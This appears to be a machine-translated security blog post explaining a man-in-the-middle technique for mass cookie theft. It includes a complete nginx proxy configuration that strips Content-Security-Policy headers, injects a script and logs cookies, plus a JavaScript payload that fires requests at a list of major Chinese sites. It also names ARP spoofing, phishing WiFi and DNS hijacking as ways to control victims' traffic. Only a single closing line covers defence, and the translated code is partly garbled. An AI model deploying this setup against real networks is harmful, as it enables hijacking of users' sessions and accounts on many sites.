EtherDream · 2016/02/01 o
0 x00 preface
Sharing a man-in-the-middle attack position works every time.
Originally is an old article, but write too wordy. Let’s go over it again today in plain English.
0 x01 principle
Traditional cookie sniffing, can only get users actively visited sites. Do not access to catch, the efficiency is very low.
If the traffic is manageable, inject a script into the page the user is visiting. With scripts, you can request any site:
#! js new Image().src = 'http://anyhost'Copy the code
Because a cookie is attached to the request header, it can trick traffic into sending cookies from any site to a middleman.
0 x02 outbreak
First collect the domain name of each major website, and then one by one:
#! js var list = ['qq.com', '163.com', 'weibo.com', ...] ; for (var i of list) { new Image().src = 'http://' + i + '/__cookie'; }Copy the code
In this way, you can put the user’s cookies on all kinds of websites.
The back end receives the /__cookie request, logs the cookie in it, and returns an empty content. A site can then be tested with minimal traffic.
0 x03 optimization
Because of the variety of sites collected, a lot of domain name resolution is required.
In order to make the explosion faster, you can hijack the user’s DNS request, temporarily resolved into their OWN IP, so that the domain name query does not have to go to the Internet.
DNS <-----> User middle man extranet <-----> HTTPCopy the code
At the same time there is a huge advantage: the whole system does not rely on the external network, can be offline hijacking!
For example, in places with no Internet, a WiFi can be used to attack.
0 x04 demo
Let’s use nginx to demonstrate:
#! Bash # nginx.conf HTTP {resolver 114.114.114.114; . log_format record_cookie '$time_iso8601 $remote_addr $http_host $http_cookie'; Server {listen 8080; server_name m.io; gzip on; #expires 1d; root /path/to/; } # proxy server {listen 8080 default_server; server_name _; gzip on; If ($http_accept ~ "text/ HTML ") {rewrite ^ /__html; } # other resources, normal proxy proxy_pass http://$http_host; } # page injection location = /__html {internal; Proxy_set_header host $http_host; Proxy_pass http://127.0.0.1:50000$request_uri; Proxy_hide_header content-security-policy; Sub_filter <head" <script SRC =//m.io/cookie.js></script><head"; } # record cookie location = /__cookie {access_log /path/to/ cookie.log record_cookie; Add_header cache-control "max-age=3600"; Return 200; }} # server {listen 127.0.0.1:50000; gunzip on; location / { proxy_set_header Accept-Encoding deflate; proxy_pass http://$host; }}}Copy the code
In the /path/to directory, place the front-end attack script:
#! js // cookie.js (function(list) { if (self ! = top) return; list = list.split(' '); for (var i = 0; i < list.length; i++) { new Image().src = 'http://' + list[i] + '/__cookie'; }})(// Target site list '163.com qq.com weibo.com')Copy the code
To demonstrate this, set your browser’s HTTP proxy to 127.0.0.1:8080.
Opening any HTTP page can expose the user’s various cookies:
There are many ways to control the flow. Such as ARP attacks, phishing WiFi, phishing agents, or hijacking the community PPPoE network, and so on.
0 x05 against
In fact, similar to JSONP privacy disclosure, close the browser “third-party cookie” can be.
Tripartite cookies are the culprit of privacy disclosure.